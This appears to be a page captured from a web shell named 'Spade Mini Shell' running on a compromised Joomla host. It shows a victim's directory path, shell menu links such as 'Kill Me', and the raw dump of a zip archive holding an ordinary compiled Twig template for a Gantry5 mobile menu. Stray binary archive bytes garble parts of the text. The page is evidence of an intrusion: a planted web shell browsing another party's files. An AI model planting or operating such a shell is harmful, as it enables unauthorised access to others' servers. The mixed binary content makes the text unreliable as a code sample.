Spade
Mini Shell
| Directory:~$ /home/lmsyaran/public_html/joomla4/ |
| [Home] [System Details] [Kill Me] |
PK
f�[�{}�++D56e01df8b1615c5b7dde5905a0033ca9f07e7eacc41b4db73965298891533714.phpnu�[���<?php
use Twig\Environment;
use Twig\Error\LoaderError;
use Twig\Error\RuntimeError;
use Twig\Markup;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityNotAllowedTagError;
use Twig\Sandbox\SecurityNotAllowedFilterError;
use Twig\Sandbox\SecurityNotAllowedFunctionError;
use Twig\Source;
use Twig\Template;
/* @particles/mobile-menu.html.twig */
class
__TwigTemplate_87135321b0938bf047124679e4764f4ca0101f8b8838c51897440c727e35a1a7
extends \Twig\Template
{
public function __construct(Environment $env)
{
parent::__construct($env);
$this->blocks = [
'particle' => [$this, 'block_particle'],
];
}
protected function doGetParent(array $context)
{
// line 1
return "@nucleus/partials/particle.html.twig";
}
protected function doDisplay(array $context, array $blocks = [])
{
$this->parent =
$this->loadTemplate("@nucleus/partials/particle.html.twig",
"@particles/mobile-menu.html.twig", 1);
$this->parent->display($context,
array_merge($this->blocks, $blocks));
}
// line 3
public function block_particle($context, array $blocks = [])
{
// line 4
echo " <div id=\"g-mobilemenu-container\"
data-g-menu-breakpoint=\"";
echo twig_escape_filter($this->env,
(($this->getAttribute($this->getAttribute(($context["gantry"]
?? null), "config", [], "any", false, true),
"get", [0 =>
"styles.breakpoints.mobile-menu-breakpoint"], "method",
true, true)) ?
(_twig_default_filter($this->getAttribute($this->getAttribute(($context["gantry"]
?? null), "config", [], "any", false, true),
"get", [0 =>
"styles.breakpoints.mobile-menu-breakpoint"],
"method"), "48rem")) : ("48rem")),
"html", null, true);
echo "\"></div>
";
}
public function getTemplateName()
{
return "@particles/mobile-menu.html.twig";
}
public function isTraitable()
{
return false;
}
public function getDebugInfo()
{
return array ( 42 => 4, 39 => 3, 29 => 1,);
}
/** @deprecated since 1.27 (to be removed in 2.0). Use
getSourceContext() instead */
public function getSource()
{
@trigger_error('The '.__METHOD__.' method is
deprecated since version 1.27 and will be removed in 2.0. Use
getSourceContext() instead.', E_USER_DEPRECATED);
return $this->getSourceContext()->getCode();
}
public function getSourceContext()
{
return new Source("{% extends
'@nucleus/partials/particle.html.twig' %}
{% block particle %}
<div id=\"g-mobilemenu-container\"
data-g-menu-breakpoint=\"{{
gantry.config.get('styles.breakpoints.mobile-menu-breakpoint')|default('48rem')
}}\"></div>
{% endblock %}
", "@particles/mobile-menu.html.twig",
"/home/lmsyaran/public_html/media/gantry5/engines/nucleus/particles/mobile-menu.html.twig");
}
}
PK
f�[�{}�++D56e01df8b1615c5b7dde5905a0033ca9f07e7eacc41b4db73965298891533714.phpnu�[���PK��